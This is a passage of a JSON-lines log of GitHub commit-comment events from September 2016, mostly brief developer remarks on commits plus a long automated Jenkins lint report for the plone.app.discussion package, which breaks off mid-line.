{"id":"4589761326","type":"CommitCommentEvent","actor":{"login":"alitokmen"},"repo":{"name":"codehaus-cargo/cargo"},"payload":{"comment":{"id":19096409,"position":null,"line":null,"path":null,"commit_id":"d612bf670252822f3ea52b8b9b226c1218bb624b","created_at":"2016-09-20T13:49:12Z","updated_at":"2016-09-20T13:49:12Z","body":"@garydux, would you like to send a PR on the Codehaus Cargo master? We merged the changes already..."}},"created_at":"2016-09-20T13:49:12Z"}
{"id":"4589762511","type":"CommitCommentEvent","actor":{"login":"toph-allen"},"repo":{"name":"ecohealthalliance/pubcrawler"},"payload":{"comment":{"id":19096412,"position":21,"line":19,"path":"iterate_infectious_disease_articles.py","commit_id":"f41a188bc3faab58687356266530892f6da6d562","created_at":"2016-09-20T13:49:24Z","updated_at":"2016-09-20T13:49:24Z","body":"I wondered about that. I wanted it to not run every time the script started (e.g. if I'm extracting geonames). What do you think is the best way to do that?"}},"created_at":"2016-09-20T13:49:24Z"}
{"id":"4589762983","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19096414,"position":10,"line":0,"path":"libraries/pom.xml","commit_id":"19c78cea2d0ec5b851b7ecd956184d44a37ef092","created_at":"2016-09-20T13:49:28Z","updated_at":"2016-09-20T13:49:28Z","body":"The goal is to have as more potential problems to happen early in build as possible. So the strategy is to move light modules before heavy modules unless they depend on each other."}},"created_at":"2016-09-20T13:49:28Z"}
{"id":"4589765645","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19096417,"position":null,"line":null,"path":null,"commit_id":"515fe02ce64cf7c1d18a669206ff1021df67017f","created_at":"2016-09-20T13:49:54Z","updated_at":"2016-09-20T13:49:54Z","body":"fast-forwarding develop-2.2 to borshop-integration-1482-bugfix_jrd_standard-test = e191fdba"}},"created_at":"2016-09-20T13:49:54Z"}
{"id":"4589769626","type":"CommitCommentEvent","actor":{"login":"jjoshua2"},"repo":{"name":"syzygy1/Cfish"},"payload":{"comment":{"id":19096424,"position":null,"line":null,"path":null,"commit_id":"63a35c574c599a81f43bc28ff8ee56f6e4d947bc","created_at":"2016-09-20T13:50:29Z","updated_at":"2016-09-20T13:50:29Z","body":"It looks like this is merely a speedup patch. What sort of gains are people seeing?"}},"created_at":"2016-09-20T13:50:29Z"}
{"id":"4589773950","type":"CommitCommentEvent","actor":{"login":"conradsnicta"},"repo":{"name":"mlpack/mlpack"},"payload":{"comment":{"id":19096436,"position":null,"line":null,"path":null,"commit_id":"310e72d7afeb952bb08a0d0dabf16cc605178528","created_at":"2016-09-20T13:51:09Z","updated_at":"2016-09-20T13:51:09Z","body":"I'm not sure this is necessary, due to the reasons listed below. In fact, I'd argue it's actually counterproductive. Using + and % instead of || and && makes the code harder to interpret and less efficient.\r\n\r\nReasoning is as follows. MLPACK requires a C++11 compiler.  The lowest version of gcc with sufficient C++11 support is gcc 4.8, which is in both Ubuntu 14.04 and RHEL 7.  Ubuntu 14.04 has Armadillo 4.200, while RHEL 7 uses EPEL 7, which currently has Armadillo 4.320 (... nudge, nudge).\r\n\r\nSupport for && and || operators is present in Armadillo 4.200.\r\n\r\nhttps://launchpad.net/ubuntu/+source/armadillo/\r\nhttps://apps.fedoraproject.org/packages/armadillo-devel\r\n"}},"created_at":"2016-09-20T13:51:09Z"}
{"id":"4589780362","type":"CommitCommentEvent","actor":{"login":"Lukas1990"},"repo":{"name":"ccrisan/motioneyeos"},"payload":{"comment":{"id":19096452,"position":null,"line":null,"path":null,"commit_id":"7fe6ed1eb6ef2291b830c3711857595770f01f9d","created_at":"2016-09-20T13:52:09Z","updated_at":"2016-09-20T13:52:09Z","body":"Connection from  the RPi was refused (ssh-putty). And server listen only on ftp not sfpt (winscp)."}},"created_at":"2016-09-20T13:52:09Z"}
{"id":"4589781537","type":"CommitCommentEvent","actor":{"login":"ornicar"},"repo":{"name":"ornicar/lila"},"payload":{"comment":{"id":19096454,"position":null,"line":null,"path":null,"commit_id":"76af7618ac10758673cf21216cbcd5191bfb625c","created_at":"2016-09-20T13:52:21Z","updated_at":"2016-09-20T13:52:21Z","body":"it's on prod now"}},"created_at":"2016-09-20T13:52:21Z"}
{"id":"4589783566","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon.tool.converter.java2ceylon"},"payload":{"comment":{"id":19096459,"position":null,"line":null,"path":null,"commit_id":"9046dad3208adce2c121c0fee7a38914cdfc5d19","created_at":"2016-09-20T13:52:40Z","updated_at":"2016-09-20T13:52:40Z","body":"yeah, I just added project files that reference 1.3.1"}},"created_at":"2016-09-20T13:52:40Z"}
{"id":"4589788997","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"ceylon/ceylon.tool.converter.java2ceylon"},"payload":{"comment":{"id":19096466,"position":null,"line":null,"path":null,"commit_id":"9046dad3208adce2c121c0fee7a38914cdfc5d19","created_at":"2016-09-20T13:53:30Z","updated_at":"2016-09-20T13:53:30Z","body":"Except for lines 37-42, it looks like…"}},"created_at":"2016-09-20T13:53:30Z"}
{"id":"4589792426","type":"CommitCommentEvent","actor":{"login":"Maxr1998"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19096477,"position":null,"line":null,"path":null,"commit_id":"73238c17012621c463756f228f5c599d6b15321a","created_at":"2016-09-20T13:54:02Z","updated_at":"2016-09-20T13:54:02Z","body":"Haha, well, then :D\r\nDidn't look at the commits ;)"}},"created_at":"2016-09-20T13:54:02Z"}
{"id":"4589793551","type":"CommitCommentEvent","actor":{"login":"niklasf"},"repo":{"name":"ornicar/lila"},"payload":{"comment":{"id":19096479,"position":null,"line":null,"path":null,"commit_id":"76af7618ac10758673cf21216cbcd5191bfb625c","created_at":"2016-09-20T13:54:12Z","updated_at":"2016-09-20T13:54:12Z","body":"cool /cc @georgvonzimmermann"}},"created_at":"2016-09-20T13:54:12Z"}
{"id":"4589795840","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon.tool.converter.java2ceylon"},"payload":{"comment":{"id":19096492,"position":null,"line":null,"path":null,"commit_id":"9046dad3208adce2c121c0fee7a38914cdfc5d19","created_at":"2016-09-20T13:54:35Z","updated_at":"2016-09-20T13:54:35Z","body":"Oh yes, that's old stuff that I forgot to delete. Thanks for noticing :)"}},"created_at":"2016-09-20T13:54:35Z"}
{"id":"4589796715","type":"CommitCommentEvent","actor":{"login":"Maxr1998"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19096497,"position":5,"line":182,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/notifications/NotificationHooks.java","commit_id":"b85c10bf01ef4711716430a559f2e705145daf05","created_at":"2016-09-20T13:54:43Z","updated_at":"2016-09-20T13:54:43Z","body":"Ah, so it also doesn't use headsUpManager? That's weird. Didn't check. Thanks!"}},"created_at":"2016-09-20T13:54:43Z"}
{"id":"4589799416","type":"CommitCommentEvent","actor":{"login":"Serg-Norseman"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19096501,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T13:55:09Z","updated_at":"2016-09-20T13:55:09Z","body":"Now gregorian_to_jd3 breaks in the date -4712/01/02 with an inaccuracy of one day (-4712/01/01). But for date -4528/02/29 all is ok. On -4528 year, the algorithm breaks again. May be left as it is? Delta is only 200 years old..."}},"created_at":"2016-09-20T13:55:09Z"}
{"id":"4589800698","type":"CommitCommentEvent","actor":{"login":"BessemFer"},"repo":{"name":"BessemFer/BelleFemme"},"payload":{"comment":{"id":19096509,"position":null,"line":null,"path":null,"commit_id":"992e1d579990283c5995ecab9f22c0aed5f15e8d","created_at":"2016-09-20T13:55:21Z","updated_at":"2016-09-20T13:55:21Z","body":"# BelleFemme\r\n# screen shots (dashboard) for the web application belle-femme\r\n# belle-femme.tn --> to visite the application \r\n"}},"created_at":"2016-09-20T13:55:21Z"}
{"id":"4589802144","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19096513,"position":null,"line":null,"path":null,"commit_id":"2016a50d3ddad734e26b085fb25be39c157f31f1","created_at":"2016-09-20T13:55:35Z","updated_at":"2016-09-20T13:55:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1071](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13643&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T13:55:35Z"}
{"id":"4589803560","type":"CommitCommentEvent","actor":{"login":"martbhell"},"repo":{"name":"CSC-IT-Center-for-Science/ansible-role-arc-frontend"},"payload":{"comment":{"id":19096516,"position":4,"line":132,"path":"defaults/main.yml","commit_id":"202a5558eb8088be15eaa83201be1116b5ed6ddc","created_at":"2016-09-20T13:55:48Z","updated_at":"2016-09-20T13:55:48Z","body":"Any special reason why this is on by default and not like some other tasks in this role (like add_slurm_accts) - enabled on demand by setting variables when running ansible-playbook?"}},"created_at":"2016-09-20T13:55:48Z"}
{"id":"4589806720","type":"CommitCommentEvent","actor":{"login":"dorugeber"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19096531,"position":4,"line":34,"path":"firedrake/__init__.py","commit_id":"6c89d8171ebbd696be7193f0e99a709bfe7846a0","created_at":"2016-09-20T13:56:18Z","updated_at":"2016-09-20T13:56:18Z","body":"file needs adding to repo?"}},"created_at":"2016-09-20T13:56:18Z"}
{"id":"4589808379","type":"CommitCommentEvent","actor":{"login":"aaronwolen"},"repo":{"name":"aaronwolen/mjbtramp"},"payload":{"comment":{"id":19096535,"position":null,"line":null,"path":null,"commit_id":"1e15715ff8baa07ba8654a3ed987c081469b7543","created_at":"2016-09-20T13:56:34Z","updated_at":"2016-09-20T13:56:34Z","body":"My motivation for looking into this is evaluating the usefulness/convenience of adding to CI to validate analyses (rather than just testing/building packages). \r\n\r\nInitially, I was unable to get packrat and caching to work and the builds were taking ~15 minutes (i.e., forever...). Your repo provided the key pieces I was missing: using `$TRAVIS_BUILD_DIR/packrat/` for the cache directory and the `--bootstrap-packrat` argument.\r\n\r\nThe builds for my test repo (private, unfortunately, but happy to add you) are now under 2 min. \r\n\r\nI'm also not using git to track the `packrat/src` directory, which keeps my repo small and hasn't caused any issues. That said, I've only tested on unix-like OSs; trying it out on Windows would be interesting. "}},"created_at":"2016-09-20T13:56:34Z"}
{"id":"4589811616","type":"CommitCommentEvent","actor":{"login":"ih24n69"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19096546,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-20T13:57:05Z","updated_at":"2016-09-20T13:57:05Z","body":"@ngoquang2708\r\n\r\nThis commit on SELinux folder its enough or need more? https://github.com/koquantam/android_kernel_samsung_grandprimeve3g-CORE/commits/cm-13.0?after=Mjc5\r\n\r\n#I am sorry for bad english :D"}},"created_at":"2016-09-20T13:57:05Z"}
{"id":"4589812759","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.discussion"},"payload":{"comment":{"id":19096549,"position":null,"line":null,"path":null,"commit_id":"82ee876de8107d6100a1cde328be1be0d8368a93","created_at":"2016-09-20T13:57:14Z","updated_at":"2016-09-20T13:57:14Z","body":"@mauritsvanrees Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.discussion/94/violations\n```\nplone/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/catalog.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/catalog.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/catalog.py:89:17: Q000 Remove bad quotes.\nplone/app/discussion/comment.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/comment.py:77:28: Q000 Remove bad quotes.\nplone/app/discussion/comment.py:170:40: Q000 Remove bad quotes.\nplone/app/discussion/comment.py:172:30: S001 found %s formatter\nplone/app/discussion/comment.py:176:48: S001 found %s formatter\nplone/app/discussion/comment.py:209:14: D001 found declareProtected replace it with AccessControl.ClassSecurityInfo.protected\nplone/app/discussion/comment.py:245:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:254:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:263:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:272:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:298:21: Q000 Remove bad quotes.\nplone/app/discussion/contentrules.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/contentrules.py:18:5: E731 do not assign a lambda expression, use a def\nplone/app/discussion/contentrules.py:26:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:48:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:59:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:70:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:81:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:92:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/conversation.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/conversation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/conversation.py:67:27: Q000 Remove bad quotes.\nplone/app/discussion/conversation.py:205:16: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:214:12: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:220:12: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:324:8: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:453:29: Q000 Remove bad quotes.\nplone/app/discussion/events.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/events.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/events.py:11:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:33:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:38:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:43:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:48:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/interfaces.py:135:17: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:161:65: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:247:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:262:21: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:280:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:284:23: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:291:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:308:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:390:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:394:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:398:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:402:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:406:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/patches.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/patches.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/testing.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/testing.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/testing.py:13:23: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:14:1: B901 blind except: statement\nplone/app/discussion/testing.py:15:23: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:66:14: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:78:10: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:81:10: Q000 Remove bad quotes.\nplone/app/discussion/tool.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tool.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/upgrades.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/upgrades.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/vocabularies.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_catalog.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_catalog.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_catalog.py:89:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:107:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:114:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:135:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:142:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:158:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:173:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:191:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:199:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:212:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:224:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:235:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:243:41: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:250:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:280:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:299:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:307:47: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:347:40: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:380:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:386:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:429:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:436:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:450:41: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:450:49: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:533:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:578:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_comment.py:55:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:56:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:57:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:106:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:108:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:114:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:130:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:131:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:135:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:136:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:158:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:166:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:179:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:182:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:187:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:231:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:262:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:267:23: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:304:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:329:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:371:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:407:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:442:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:450:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:459:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:468:38: S001 found %s formatter\nplone/app/discussion/tests/test_comments_viewlet.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_comments_viewlet.py:43:1: F811 redefinition of unused 'IConversation' from line 38\nplone/app/discussion/tests/test_comments_viewlet.py:112:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:126:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:134:43: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:135:60: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:137:66: W291 trailing whitespace\nplone/app/discussion/tests/test_comments_viewlet.py:180:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:194:59: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:196:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_comments_viewlet.py:236:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:281:27: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:316:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:405:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:406:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:411:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:416:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:417:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:418:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:429:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:430:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:431:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:487:63: S001 found %s formatter\nplone/app/discussion/tests/test_contentrules.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_contentrules.py:6:1: F401 'notify' imported but unused\nplone/app/discussion/tests/test_contentrules.py:22:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_contentrules.py:51:24: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:52:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:53:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:54:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:59:5: E303 too many blank lines (2)\nplone/app/discussion/tests/test_contentrules.py:117:38: S001 found %s formatter\nplone/app/discussion/tests/test_contentrules.py:121:38: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:122:34: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:123:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:126:9: F841 local variable 'new_re_id' is assigned to but never used\nplone/app/discussion/tests/test_contentrules.py:135:35: E127 continuation line over-indented for visual indent\nplone/app/discussion/tests/test_contentrules.py:145:44: E127 continuation line over-indented for visual indent\nplone/app/discussion/tests/test_controlpanel.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_controlpanel.py:36:18: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_controlpanel.py:43:56: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_controlpanel.py:92:5: F811 redefinition of unused 'test_edit_comment_enabled' from line 84\nplone/app/discussion/tests/test_controlpanel.py:145:5: E265 block comment should start with '# '\nplone/app/discussion/tests/test_conversation.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_conversation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_conversation.py:31:1: B901 blind except: statement\nplone/app/discussion/tests/test_conversation.py:91:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:93:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:94:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:95:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:96:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:96:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:97:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:518:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_conversation.py:560:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:565:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:570:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:575:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:969:38: S001 found %s formatter\nplone/app/discussion/tests/test_conversation.py:973:38: S001 found %s formatter\nplone/app/discussion/tests/test_conversation.py:978:38: S001 found %s formatter\nplone/app/discussion/tests/test_events.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_events.py:15:1: E302 expected 2 blank lines, found 0\nplone/app/discussion/tests/test_events.py:26:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:29:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:32:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:35:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:40:1: E302 expected 2 blank lines, found 0\nplone/app/discussion/tests/test_events.py:81:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_events.py:99:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:138:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_events.py:151:38: S001 found %s formatter\nplone/app/discussion/tests/test_events.py:157:9: F841 local variable 'new_re_id' is assigned to but never used\nplone/app/discussion/tests/test_events.py:171:38: S001 found %s formatter\nplone/app/discussion/tests/test_functional.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_indexers.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_indexers.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_indexers.py:54:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:55:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:62:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:63:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:70:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:71:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:110:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_indexers.py:112:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_indexers.py:139:27: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:140:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:170:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:170:41: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_migration.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_migration.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_migration.py:55:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_migration.py:68:14: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_migration.py:214:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_moderation_view.py:111:38: S001 found %s formatter\nplone/app/discussion/tests/test_moderation_view.py:119:38: S001 found %s formatter\nplone/app/discussion/tests/test_moderation_view.py:127:38: S001 found %s formatter\nplone/app/discussion/tests/test_notifications.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_notifications.py:37:42: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:64:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:86:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:87:13: S001 found % formatter\nplone/app/discussion/tests/test_notifications.py:102:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:130:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:146:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:151:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:176:42: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:227:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:228:13: S001 found % formatter\nplone/app/discussion/tests/test_notifications.py:234:13: S001 found % formatter\nplone/app/discussion/tests/test_notifications.py:238:13: S001 found % formatter\nplone/app/discussion/tests/test_tool.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_tool.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_tool.py:32:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_tool.py:42:13: Q000 Remove bad 